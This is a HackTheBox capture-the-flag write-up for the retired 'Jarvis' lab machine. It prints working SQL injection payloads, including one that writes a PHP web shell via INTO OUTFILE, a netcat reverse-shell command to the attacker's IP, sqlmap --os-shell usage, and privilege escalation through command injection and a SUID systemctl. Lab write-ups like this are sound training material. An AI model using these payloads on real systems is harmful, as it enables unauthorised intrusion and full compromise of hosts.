Jarvis – HackTheBox writeup
info

Jarvis is a retired vulnerable machine available from HackTheBox. The machine maker is manulqwerty & Ghostpp7, thank you. It has a Medium difficulty with a rating of 4.9 out of 10. I think it’s somewhat between easy & medium.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.

Exploitation Summary (tap to reveal)

Initial Exploitation

  • Vulnerability: SQL Injection
  • Explanation: Webpage room.php is vulnerable to SQL Injection. That leads to command execution through SQL Injection

Privilege Escalation – from www-data

  • Vulnerability: Command execution via sudo ability
  • Explanation: user www-data is capable to execute sudo /var/www/Admin-Utilities/simpler.py, which is vulnerable to remote command execution

Privilege Escalation – from pepper

  • Vulnerability: /bin/systemctl with SUID bit set
  • Explanation: /bin/systemctl can be executed with root privilege. That leads to arbitrary command execution with root permissions.

Enumeration

nmap -p- -A -T4 10.10.10.143
nmap
TCP 22: OpenSSH 7.4p1
TCP 80: Apache httpd 2.4.25
TCP 64999: Apache httpd 2.4.25

Both port 80 & 64999 are running a website using Apache httpd. Let’s check them out.

webpage 80

Website at port 80 is for Stark Hotel. There are a few pages about dining & hotel rooms.

Webpage at port 64999 shows a message that I am banned for 90 seconds. And it’s the same message for all URLs I tried. This is most likely a rabbit hole. Let’s go back to port 80 to examine further. Most links are just links back to itself. And all pages are information only. The only page that have input that we can tamper with is room.php with cod parameter in the querystring.

room

Let’s check out if it’s vulnerable to SQL injection using

cod=1+and+2=2

Success. The room information is retrieved. That mean’s the parameter is vulnerable to SQL injection. I then use a union statement to determine number of columns of the query.

cod=1+union+select+1
cod=1+union+select+1,2
cod=1+union+select+1,2,3
cod=1+union+select+1,2,3,4
cod=1+union+select+1,2,3,4,5
cod=1+union+select+1,2,3,4,5,6
cod=1+union+select+1,2,3,4,5,6,7
cod=1+union+select+1,2,3,4,5,6,7,8

I try different number of columns and the page only fails when I try 8 columns. That means the query is using 7 columns.

All right. Next try to inject a php file through SQL injection. If this is successful, we can achieve remote command execution through the injected php file:

cod=1+union+select+1,2,3,4,5,6,'<?php_system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php'

I then navigate to cmd.php:

http://10.10.10.143/cmd.php?cmd=id
rce

That works. Awesome, I can now try to get a reverse shell using netcat.

First listening to port 4000 using netcat at kali. Then try to run netcat using cmd.php.

http://10.10.10.143/cmd.php?cmd=nc+-c+/bin/bash+10.10.14.30+4000
initial shell

Initial shell obtained.

Shell through SQLMap

Sqlmap is a great tool that can help perform SQL injection faster. I am doing a quick run using SQLMap to demonstrate it’s awesomeness.

sqlmap -u http://10.10.10.143/room.php?cod=1
sqlmap

By running the sqlmap command, it does all the dirty work and quickly tell me it’s vulnerable. Next, we can retrieve the database content using –dump option or try to gain shell using –os-shell option.

sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
shell using sqlmap

Shell obtained. Fast and easy using sqlmap.

Privilege Escalation – Part 1

sudo -l
sudo

sudo -l is one of my favorite commands to run after getting an initial shell. Ability to run some sudo commands often leads to privilege escalation. This time, user www-data can run simpler.py as pepper. Let’s see what it does:

sudo -u pepper /var/www/Admin-Utilities/simpler.py
simpler.py

Looks like a utility about attackers. Let’s examine it’s code.

Apparently, it is analyzing log files located at /home/pepper/Web/Logs/ and provides statistics, list the attackers and a quick ping utility. Let’s take a quick look at Logs directory:

logs

Interestingly, it has a text file with my IP address 10.10.14.30. And the content is listing some attacks identified from my ip address. These are commands executed when I scan the machine. I wonder how is that collected.

processes

Upon checking the processes running shows that there is a command /root/sqli_defender.py running with root privilege. I think that’s the tool used to identify attacks. It may be a tool we can exploit later to get root access. But let’s keep it for now and go back to simpler.py command.

I examine simpler.py‘s code further and identify the ping utility is vulnerable to command injection:

command injection

The routine will check for some forbidden characters and stop the execution if you use them. To escape that check, I used $(bash) to perform command execution to obtain a bash shell. However, standard output is not available and I use netcat to get a reverse shell using port 4001.

bash
pepper shell

Awesome, get shell as user pepper. I now have access to user.txt.

user flag

Privilege Escalation – Part 2

It’s not obvious how to exploit the /root/sqli_defender.py as I have no access to the file. So I proceed to perform more enumeration on the box. One of my favorite tools is linenum.sh.

An interesting command /bin/systemctl is found with SUID bit set. linenum.sh is able to find it or you can use the following command:

find / -perm -4000 -user root 2> /dev/null
systemctl
systemctl suid

gtfobins is a great site that has a collection of commands that can be utilized to achieve privilege escalation. And we can find systemctl right there.

systemctl privesc

By following the instructions, I am able to get a reverse shell as root at port 4002:

privesc
root shell

Perfect! Root shell obtained. Final task is to obtain the root flag:

root flag

Leave a Reply

Close Menu